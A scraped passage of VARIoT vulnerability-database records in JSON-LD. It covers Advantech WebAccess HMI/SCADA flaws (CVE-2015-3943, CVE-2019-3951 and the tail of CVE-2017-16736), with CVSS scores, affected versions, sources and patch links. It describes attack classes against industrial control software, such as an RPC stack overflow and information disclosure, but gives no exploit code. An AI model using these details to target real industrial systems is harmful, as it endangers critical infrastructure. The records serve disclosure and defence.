"https://nvd.nist.gov/vuln/detail/cve-2017-16736" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "VULHUB", "id": "VHN-107688" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNNVD", "id": "CNNVD-201801-560" }, { "db": "NVD", "id": "CVE-2017-16736" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "VULHUB", "id": "VHN-107688" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNNVD", "id": "CNNVD-201801-560" }, { "db": "NVD", "id": "CVE-2017-16736" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-02-01T00:00:00", "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "date": "2018-02-01T00:00:00", "db": "CNVD", "id": "CNVD-2018-02540" }, { "date": "2018-01-12T00:00:00", "db": "VULHUB", "id": "VHN-107688" }, { "date": "2018-02-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "date": "2018-01-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-560" }, { "date": "2018-01-12T02:29:02.037000", "db": "NVD", "id": "CVE-2017-16736" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-02-01T00:00:00", "db": "CNVD", "id": "CNVD-2018-02540" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-107688" }, { "date": "2018-02-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-560" }, { "date": "2024-11-21T03:16:52.577000", "db": "NVD", "id": "CVE-2017-16736" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201801-560" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Arbitrary file upload vulnerability", "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Code problem", "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-560" } ], "trust": 0.8 } }
var-201601-0639
Vulnerability from variot
Advantech WebAccess before 8.1 allows remote attackers to read sensitive cleartext information about e-mail project accounts via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0639", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNNVD", "id": "CNNVD-201601-319" }, { "db": "NVD", "id": "CVE-2015-3943" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006781" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2015-3943", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2015-3943", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2016-00432", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "64f18bc6-2351-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-81904", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 3.9, "id": "CVE-2015-3943", "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-3943", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2015-3943", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00432", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-319", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-81904", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "VULHUB", "id": "VHN-81904" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNNVD", "id": "CNNVD-201601-319" }, { "db": "NVD", "id": "CVE-2015-3943" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess before 8.1 allows remote attackers to read sensitive cleartext information about e-mail project accounts via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2015-3943" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-81904" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3943", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-319", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00432", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006781", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64F18BC6-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-81904", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "VULHUB", "id": "VHN-81904" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNNVD", "id": "CNNVD-201601-319" }, { "db": "NVD", "id": "CVE-2015-3943" } ] }, "id": "VAR-201601-0639", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "VULHUB", "id": "VHN-81904" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00432" } ] }, "last_update_date": "2024-11-23T21:43:23.114000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Information Disclosure Vulnerability (CNVD-2016-00432)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70368" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59637" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNNVD", "id": "CNNVD-201601-319" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-81904" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "NVD", "id": "CVE-2015-3943" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3943" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3943" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "VULHUB", "id": "VHN-81904" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNNVD", "id": "CNNVD-201601-319" }, { "db": "NVD", "id": "CVE-2015-3943" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00432" }, { "db": "VULHUB", "id": "VHN-81904" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "db": "CNNVD", "id": "CNNVD-201601-319" }, { "db": "NVD", "id": "CVE-2015-3943" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64f18bc6-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00432" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-81904" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-319" }, { "date": "2016-01-15T03:59:00.120000", "db": "NVD", "id": "CVE-2015-3943" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00432" }, { "date": "2016-01-18T00:00:00", "db": "VULHUB", "id": "VHN-81904" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006781" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-319" }, { "date": "2024-11-21T02:30:06.933000", "db": "NVD", "id": "CVE-2015-3943" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-319" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to reading important plaintext information about email project accounts", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006781" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-319" } ], "trust": 0.6 } }
var-201912-0756
Vulnerability from variot
Advantech WebAccess before 8.4.3 allows unauthenticated remote attackers to execute arbitrary code or cause a denial of service (memory corruption) due to a stack-based buffer overflow when handling IOCTL 70533 RPC messages. Advantech WebAccess Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a set of HMI / SCADA software based on browser architecture by Advantech of Taiwan, China. The software supports dynamic graphic display and real-time data control, and provides the ability to remotely control and manage automation equipment.
A buffer overflow vulnerability exists in Advantech WebAccess versions prior to 8.4.3. The vulnerability originates from a network system or product that incorrectly validates data boundaries when performing operations on memory, causing incorrect read and write operations to be performed on other associated memory locations. An attacker could use this vulnerability to cause a buffer overflow or heap overflow
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201912-0756", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 2.4, "vendor": "advantech", "version": "8.4.3" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "NVD", "id": "CVE-2019-3951" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-013206" } ] }, "cve": "CVE-2019-3951", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-3951", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2019-45387", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-155386", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-3951", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-3951", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3951", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-3951", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-45387", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201912-657", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-155386", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "VULHUB", "id": "VHN-155386" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "CNNVD", "id": "CNNVD-201912-657" }, { "db": "NVD", "id": "CVE-2019-3951" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess before 8.4.3 allows unauthenticated remote attackers to execute arbitrary code or cause a denial of service (memory corruption) due to a stack-based buffer overflow when handling IOCTL 70533 RPC messages. Advantech WebAccess Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a set of HMI / SCADA software based on browser architecture by Advantech of Taiwan, China. The software supports dynamic graphic display and real-time data control, and provides the ability to remotely control and manage automation equipment. \n\nA buffer overflow vulnerability exists in Advantech WebAccess versions prior to 8.4.3. The vulnerability originates from a network system or product that incorrectly validates data boundaries when performing operations on memory, causing incorrect read and write operations to be performed on other associated memory locations. An attacker could use this vulnerability to cause a buffer overflow or heap overflow", "sources": [ { "db": "NVD", "id": "CVE-2019-3951" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "VULHUB", "id": "VHN-155386" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3951", "trust": 3.3 }, { "db": "TENABLE", "id": "TRA-2019-52", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201912-657", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-45387", "trust": 0.8 }, { "db": "JVNDB", "id": 